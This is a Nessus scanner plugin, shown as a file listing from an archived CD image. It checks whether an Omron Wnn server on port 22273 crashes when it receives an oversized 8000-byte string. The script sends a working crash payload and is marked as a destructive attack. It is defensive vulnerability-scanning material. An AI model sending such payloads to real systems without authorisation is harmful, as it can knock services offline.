home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / wnn_overflow.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  68 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6. #
  7. # References:
  8. # http://www.tomo.gr.jp/users/wnn/0008ml/msg00000.html
  9. # http://online.securityfocus.com/advisories/4413
  10.  
  11. if(description)
  12. {
  13.  script_id(11108);
  14.  script_bugtraq_id(1603);
  15.  script_version ("$Revision: 1.4 $");
  16.  script_cve_id("CAN-2000-0704");
  17.  name["english"] = "Omron WorldView Wnn Overflow";
  18.  
  19.  script_name(english:name["english"]);
  20.          
  21.  desc["english"] = "
  22. It was possible to make the remote Wnn server crash
  23. by sending an oversized string to it.
  24.  
  25. Solution : upgrade to the latest version or contact your vendor 
  26. for a patch
  27. See also: http://online.securityfocus.com/advisories/4413
  28. Risk factor : High";
  29.          
  30.          
  31.               
  32.  script_description(english:desc["english"],
  33.              francais:desc["francais"]);
  34.             
  35.  
  36.  script_summary(english:"Checks if the remote Wnn can be buffer overflown");
  37.  script_category(ACT_DESTRUCTIVE_ATTACK);
  38.  script_family(english:"Gain a shell remotely");
  39.  
  40.  script_copyright(english:"This script is Copyright (C) 2002 Renaud Deraison",
  41.            francais:"Ce script est Copyright (C) 2002 Renaud Deraison");
  42.           
  43.  script_require_ports(22273);
  44.  exit(0);
  45. }
  46.  
  47. #
  48. # The script code starts here : 
  49. #
  50.  
  51. port = 22273;
  52. if(!get_port_state(port))exit(0);
  53. soc = open_sock_tcp(port);
  54. if(soc)
  55. {
  56.   send(socket:soc, data:raw_string(0x00, 0x00, 0x00, 0x01));
  57.   send(socket:soc, data:raw_string(0x00, 0x00, 0x40, 0x00));
  58.   buf = crap(8000);
  59.   buf[10] = raw_string(0);
  60.   buf[799] = raw_string(0);
  61.   send(socket:soc, data:buf);
  62.   close(soc);
  63.   sleep(1);
  64.   soc2 = open_sock_tcp(port);
  65.   if(!soc2)security_hole(port);
  66. }
  67.